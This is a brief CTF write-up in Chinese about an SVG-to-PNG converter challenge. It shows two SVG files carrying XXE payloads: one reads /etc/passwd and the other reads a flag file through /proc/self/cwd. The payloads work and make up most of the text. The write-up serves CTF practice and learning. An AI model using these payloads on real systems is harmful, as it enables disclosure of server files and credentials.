打开环境是一个svg转png的
参考合天的浅谈SVG的两个黑魔法
由SVG造成的XXE注入
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="200" width="1000">
<text x="10" y="20">&file;</text>
</svg>
上传
可以读到passwd
读取/proc/self/cwd/flag.txt
/proc/self 链接到当前正在运行的进程
/proc/self/cwd当前工作目录
小本本记下来
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="200" width="1000">
<text x="10" y="20">&file;</text>
</svg>